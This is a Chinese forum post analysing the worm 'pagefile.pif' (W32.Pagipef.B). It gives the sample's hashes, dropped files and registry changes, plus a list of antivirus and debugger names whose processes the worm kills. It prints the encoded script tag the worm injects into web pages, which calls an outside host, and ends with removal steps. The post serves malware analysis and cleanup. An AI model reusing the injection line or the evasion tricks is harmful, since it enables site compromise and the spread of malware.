pagefile.pif (W32.Pagipef.B)
昨天在别人电脑上抓的````一个pagefile.pif````
不记得自己写过没有``不过以前遇到过几次``好像是更新的版本`
`过7日的卡吧、瑞星、BD等``
这次更新的版本比较恶劣,怀疑是熊猫原码泄露```` :(
…………
Aditional Information
File size: 69632 bytes
MD5: 86ae07b7f81a35f268d11fe39a090a50
SHA1: a09329ed3d8b729372f01819b30c3004011e04ee
CRC32 : 84E8D7FA
RIPEMD160: 1C8C3977C66AF86DBC31D38BBD7A0CB4F10096B9
SHA160 : A09329ED3D8B729372F01819B30C3004011E04EE
packers: BINARYRES, FSG
Languages:Microsoft Visual C++ 6.0
File size: 69632 bytes
MD5: 86ae07b7f81a35f268d11fe39a090a50
SHA1: a09329ed3d8b729372f01819b30c3004011e04ee
CRC32 : 84E8D7FA
RIPEMD160: 1C8C3977C66AF86DBC31D38BBD7A0CB4F10096B9
SHA160 : A09329ED3D8B729372F01819B30C3004011E04EE
packers: BINARYRES, FSG
Languages:Microsoft Visual C++ 6.0
运行,释放:
%Systemroot%\system32\Com\lsass.exe 69632 字节 (RHSA)
%Systemroot%\system32\Com\smss.exe 9261 字节
每个分区(C―F)下的Autorun.inf和pagefile.pif
貌似不支持U盘传播 =.=`(至少没跟踪到)
修改注册表:
(用了另类方法破坏“显示隐藏文件”功能)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
的ShowSuperHidden值修改为0(原本为1)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden
的Type值写入乱码(原为checkbox)
假冒系统文件的lsass.exe 和smss.exe (路径为%Systemroot%\system32\Com\)``
使用双进程守护技术```
监视对方的存在和自身同党、注册表项等``如被修改或删除,则重写````
并尝试关闭下列关键字:
process
安全卫士
asm
ida
进程
卡巴
瑞星
毒霸
杀毒
江民
softice
virus
symantec
avp
regedit
kaka
汗``连反汇编工具都不放过`````!
后遍历磁盘,查找扩展名为jsp php spx asp tml htm的,插入一段代码:
<script src=" h**p://%78%77%2E%6D%6F%76%37%38%2E%63%6F%6D/%62%32%2E%61%73%70"></script>
解密后得:
h**p://xw.mov78.com/b2.asp
由于时间关闭,并未光临该网站,我猜一定有很多好玩的东西````
最后还感染了除系统盘和Windows目录的所有EXE文件``从D盘开始`````
感染方式为捆绑``多了2个MZ头,应该是那2个狼狈为**假冒系统文件的东东吧``
没有深入跟踪```自己也不清楚````` :Q
解决方法:
[url]http://gudugengkekao.ys168.com/[/url]下载:
PowerRmv.com 101KB
下不了的,自己去网上找````
放到桌面,关闭不需要的进程```断开网络``
打开PowerRmv,选上“抑制对象生成”,填入(一次一个,后面不要有空格):
C:\Windows\system32\Com\lsass.exe
C:\Windows\system32\Com\smss.exe
C:\AUTORUN.INF
C:\pagefile.pif
D:\AUTORUN.INF
D:\pagefile.pif
E:\AUTORUN.INF
E:\pagefile.pif
F:\AUTORUN.INF
F:\pagefile.pif
打开注册表,把上面提到的键值改回来```ShowSuperHidden和Type值```
然后升级杀软,全盘扫``修复被感染的EXE文件```
(捆绑方式的,修复成功率应该很高吧?。。。)
PP:
